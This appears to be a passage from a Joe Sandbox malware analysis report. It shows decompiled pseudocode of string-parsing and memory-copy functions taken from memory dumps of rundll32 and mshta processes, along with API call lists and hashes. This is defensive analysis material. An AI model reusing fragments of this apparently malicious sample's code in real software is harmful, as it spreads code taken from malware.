                                • Opcode Fuzzy Hash: 074d65097f1f8433c26f59aa50f6ef54621e68bfebddeba1c208b63b9ff19d5c
                                • Instruction Fuzzy Hash: 05F0FE74300212DFF734AB58D949F2937F9AB44318B049054F9C2E77B4C67AAC00CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E010645C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E01066D63(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E01066D63(_t28);
                                					if(_t30 == 0) {
                                						E01066C2C(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E01067A57(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E01067A57(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}














                                0x010645c4
                                0x010645ce
                                0x010645d0
                                0x010645d6
                                0x010645d6
                                0x010645df
                                0x010645e3
                                0x010645ef
                                0x010645f3
                                0x01064667
                                0x010645f5
                                0x010645f5
                                0x010645f9
                                0x010645fe
                                0x01064603
                                0x0106461d
                                0x0106460c
                                0x0106460c
                                0x01064610
                                0x01064613
                                0x01064618
                                0x01064618
                                0x01064622
                                0x0106464a
                                0x01064650
                                0x01064653
                                0x01064624
                                0x01064626
                                0x0106462e
                                0x01064639
                                0x0106463e
                                0x0106463e
                                0x0106465a
                                0x01064661
                                0x01064662
                                0x01064662
                                0x010645f3
                                0x01064672

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,01066973,?,?,?,?,00000102,010637A0,?,?,76DC81D0), ref: 010645D0
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                  • Part of subcall function 01067A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010645FE,00000000,00000001,00000001,?,?,01066973,?,?,?,?,00000102), ref: 01067A65
                                  • Part of subcall function 01067A57: StrChrA.SHLWAPI(?,0000003F,?,?,01066973,?,?,?,?,00000102,010637A0,?,?,76DC81D0,00000000), ref: 01067A6F
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01066973,?,?,?,?,00000102,010637A0,?), ref: 0106462E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0106463E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0106464A
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 84c5ba20f26698eb22538917e60806255ae15e233fc3b37d3c87e8c42fd9eb96
                                • Instruction ID: 43e2843c106a1f83477c21bd133e4e49be4a2a119fd7575ad0af848279fbf2e3
                                • Opcode Fuzzy Hash: 84c5ba20f26698eb22538917e60806255ae15e233fc3b37d3c87e8c42fd9eb96
                                • Instruction Fuzzy Hash: F221C072504256EFDB126FB8C884AAF7FECAF59294F058090F985DB201D636DE00C7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010628C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E01066D63(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}








                                0x010628d9
                                0x010628dd
                                0x010628e7
                                0x010628ec
                                0x010628f1
                                0x010628f3
                                0x010628fb
                                0x01062900
                                0x0106290e
                                0x01062913
                                0x0106291d

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,76D85520,00000008,051093F4,?,010621EB,004F0053,051093F4,?,?,?,?,?,?,010666BE), ref: 010628D4
                                • lstrlenW.KERNEL32(010621EB,?,010621EB,004F0053,051093F4,?,?,?,?,?,?,010666BE), ref: 010628DB
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • memcpy.NTDLL(00000000,004F0053,76D869A0,?,?,010621EB,004F0053,051093F4,?,?,?,?,?,?,010666BE), ref: 010628FB
                                • memcpy.NTDLL(76D869A0,010621EB,00000002,00000000,004F0053,76D869A0,?,?,010621EB,004F0053,051093F4), ref: 0106290E
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 7b750166307c3574e7bd9ed129f10bea6abc54d11d6c82151796e5a9bc105a32
                                • Instruction ID: 49451d0f5f3ed4bb4025c34ff645fb196879acf9f722b2134b81dd9a21d6c49d
                                • Opcode Fuzzy Hash: 7b750166307c3574e7bd9ed129f10bea6abc54d11d6c82151796e5a9bc105a32
                                • Instruction Fuzzy Hash: 82F04F7290011ABB9F11EFA9CC84CCE7BACEF082547014062F908D7101E731EA148BE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(05109B68,00000000,00000000,00000000,01065902,00000000), ref: 0106394C
                                • lstrlen.KERNEL32(?), ref: 01063954
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • lstrcpy.KERNEL32(00000000,05109B68), ref: 01063968
                                • lstrcat.KERNEL32(00000000,?), ref: 01063973
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: bdef8fe64ae042d2b704cc1cb751321a0fed5841c5333f32109f9a424a96323e
                                • Instruction ID: 94e1dfae9cbe2ac4ee4a8b8338f14cc0b82b73cd53cc41657d8c56fb4278bffa
                                • Opcode Fuzzy Hash: bdef8fe64ae042d2b704cc1cb751321a0fed5841c5333f32109f9a424a96323e
                                • Instruction Fuzzy Hash: 85E09273901621AF87216BE8AC48C9BBBBCEF996617040416F640D7124C77B98018BE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000009.00000003.533569828.000002213C970000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002213C970000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_3_2213c970000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                • Instruction ID: cab64fdf68e68b51fd5224cbc331c5e77779f4d65efe1ef7fe472efc856883aa
                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                • Instruction Fuzzy Hash: 019004044D740775D41455D10D5D75C504173DC350FD754C04417D0144D44D43F71353
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000009.00000003.533569828.000002213C970000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002213C970000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_3_2213c970000_mshta.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                • Instruction ID: cab64fdf68e68b51fd5224cbc331c5e77779f4d65efe1ef7fe472efc856883aa
                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                • Instruction Fuzzy Hash: 019004044D740775D41455D10D5D75C504173DC350FD754C04417D0144D44D43F71353
                                Uniqueness

                                Uniqueness Score: -1.00%